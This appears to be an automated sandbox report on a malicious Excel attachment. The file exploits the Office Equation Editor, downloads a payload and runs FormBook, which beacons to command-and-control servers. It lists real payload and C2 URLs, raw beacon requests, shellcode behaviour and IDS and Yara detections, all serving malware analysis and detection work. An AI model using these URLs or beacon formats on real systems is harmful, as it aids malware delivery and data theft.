Source: Yara match	File source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
23.81.214.26	www.yiwanggkm.com	United States	396190	LEASEWEB-USA-SEA-10US	true
34.102.136.180	arjimni.com	United States	15169	GOOGLEUS	false
198.54.117.212	parkingpage.namecheap.com	United States	22612	NAMECHEAP-NETUS	false
104.168.33.31	unknown	United States	36352	AS-COLOCROSSINGUS	true
164.155.217.57	www.tw-life.net	South Africa	26484	IKGUL-26484US	true

Contacted Domains

Name	IP	Active
www.tw-life.net	164.155.217.57	true
parkingpage.namecheap.com	198.54.117.212	true
www.yiwanggkm.com	23.81.214.26	true
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com	18.119.154.66	true
arjimni.com	34.102.136.180	true
www.arjimni.com	unknown	unknown
www.contractornurd.com	unknown	unknown
www.skinclash.com	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.yiwanggkm.com/nc39/?dZzp=SW2DOu4AoD1tt2PaEEhiNvSk2qD2OpQeAcSR0NEUE8SsNGniN/+F24NqGXKX7Cj1ljS/6Q==&3f=j6AdrVwh	true	Avira URL Cloud: safe	unknown
http://www.tw-life.net/nc39/?dZzp=Td3Z6WACWlvn2oxJ5kz3cAAvTYM+vx9a0mv4ko18Io/mhbtUurGZKYFJi0A4+N8FDsGh8g==&3f=j6AdrVwh	true	Avira URL Cloud: safe	unknown
www.arjimni.com/nc39/	true	Avira URL Cloud: malware	low
http://www.arjimni.com/nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwh	false	Avira URL Cloud: malware	unknown
http://104.168.33.31/75/vbc.exe	true	Avira URL Cloud: malware	unknown
http://www.contractornurd.com/nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh	true	Avira URL Cloud: malware	unknown

AV Detection

Found malware configuration

Source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp

Multi AV Scanner detection for submitted file

Source: DL03327INV.xlsx	Virustotal: Detection: 38%			Perma Link
Source: DL03327INV.xlsx	ReversingLabs: Detection: 26%

Yara detected FormBook

Source: Yara match	File source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Antivirus detection for URL or domain

Source: www.arjimni.com/nc39/	Avira URL Cloud: Label: malware
Source: http://www.arjimni.com/nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwh	Avira URL Cloud: Label: malware
Source: http://104.168.33.31/75/vbc.exe	Avira URL Cloud: Label: malware
Source: http://www.contractornurd.com/nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	ReversingLabs: Detection: 51%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 51%

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 6.2.yldnat.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.yldnat.exe.120000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.3.EQNEDT32.EXE.6af7ba.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 6.0.yldnat.exe.400000.9.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.yldnat.exe.400000.5.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.yldnat.exe.400000.7.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 104.168.33.31 Port: 80

Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\zjary\jjvucn\mxni\b98fa234680046ddacdf27145f9ff7b1\qjcbwv\ygyntjah\Release\ygyntjah.pdb source: vbc.exe, 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp, yldnat.exe, 00000005.00000000.976220140.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, yldnat.exe, 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, yldnat.exe, 00000006.00000000.982290199.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, wuapp.exe, 00000008.00000002.1176125071.0000000002397000.00000004.10000000.00040000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175572763.0000000000352000.00000004.00000020.00020000.00000000.sdmp, nss8A2D.tmp.4.dr, yldnat.exe.4.dr
Source:	Binary string: wntdll.pdb source: yldnat.exe, yldnat.exe, 00000006.00000003.985070971.00000000006C0000.00000004.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032618043.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000003.983271572.0000000000560000.00000004.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, wuapp.exe, 00000008.00000003.1032134115.0000000000780000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175921231.0000000002010000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.1033412733.0000000001D00000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wuapp.pdb source: yldnat.exe, 00000006.00000002.1031989955.0000000000030000.00000040.10000000.00040000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032320172.0000000000484000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405D7A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004069A4 FindFirstFileW,FindClose,	4_2_004069A4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Software Vulnerabilities

Shellcode detected

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D04FF URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_036D04FF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D052D ShellExecuteW,ExitProcess,	2_2_036D052D
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D0494 LoadLibraryW,URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_036D0494
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D03EF ExitProcess,	2_2_036D03EF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D0552 ExitProcess,	2_2_036D0552
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D04AE URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_036D04AE
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D0424 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_036D0424
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D0408 URLDownloadToFileW,ShellExecuteW,ExitProcess,	2_2_036D0408
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D0518 ShellExecuteW,ExitProcess,	2_2_036D0518

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: www.arjimni.com

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 104.168.33.31:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49173 -> 104.168.33.31:80

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 23.81.214.26 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.arjimni.com
Source: C:\Windows\explorer.exe	Domain query: www.tw-life.net
Source: C:\Windows\explorer.exe	Domain query: www.contractornurd.com
Source: C:\Windows\explorer.exe	Domain query: www.yiwanggkm.com
Source: C:\Windows\explorer.exe	Network Connect: 164.155.217.57 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.212 80	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49175 -> 198.54.117.212:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49175 -> 198.54.117.212:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49175 -> 198.54.117.212:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.arjimni.com/nc39/

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: LEASEWEB-USA-SEA-10US LEASEWEB-USA-SEA-10US

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwh HTTP/1.1Host: www.arjimni.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh HTTP/1.1Host: www.contractornurd.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nc39/?dZzp=Td3Z6WACWlvn2oxJ5kz3cAAvTYM+vx9a0mv4ko18Io/mhbtUurGZKYFJi0A4+N8FDsGh8g==&3f=j6AdrVwh HTTP/1.1Host: www.tw-life.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /nc39/?dZzp=SW2DOu4AoD1tt2PaEEhiNvSk2qD2OpQeAcSR0NEUE8SsNGniN/+F24NqGXKX7Cj1ljS/6Q==&3f=j6AdrVwh HTTP/1.1Host: www.yiwanggkm.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 198.54.117.212 198.54.117.212

Downloads executable code via HTTP

Source: global traffic

Uses a known web browser user agent for HTTP communication

Source: global traffic

Contains functionality to download and execute PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_036D04FF URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_036D04FF

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sat, 14 May 2022 13:20:49 GMTContent-Type: text/htmlContent-Length: 291ETag: "627e7264-123"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 May 2022 13:21:05 GMTContent-Type: text/htmlContent-Length: 466Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 d2 b3 c3 e6 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 71 71 2e 63 6f 6d 2f 34 30 34 2f 73 65 61 72 63 68 5f 63 68 69 6c 64 72 65 6e 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a c4 e3 b7 c3 ce ca b5 c4 d2 b3 c3 e6 b2 bb b4 e6 d4 da a1 a3 a1 a3 a1 a3 a1 a3 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e b7 b5 bb d8 d6 f7 d2 b3 3c 2f 61 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>404</title></head><body><script type="text/javascript" src="http://www.qq.com/404/search_children.js" charset="utf-8"></script> <a href="/"></a></body></html>

Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31
Source: unknown	TCP traffic detected without corresponding DNS query: 104.168.33.31

Source: EQNEDT32.EXE, 00000002.00000002.971169653.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.comI equals www.linkedin.com (Linkedin)
Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: EQNEDT32.EXE, 00000002.00000002.971169653.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: EQNEDT32.EXE, 00000002.00000003.965529883.000000000069F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.971155692.0000000000614000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.33.31/75/vbc.exe
Source: EQNEDT32.EXE, 00000002.00000002.971169653.000000000061F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://104.168.33.31/75/vbc.exehhC:
Source: EQNEDT32.EXE, 00000002.00000002.972741377.00000000036D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://104.168.33.31/75/vbc.exej
Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000000.968426551.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, vbc[1].exe.2.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000007.00000000.1070008053.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000007.00000000.1008792318.0000000006450000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
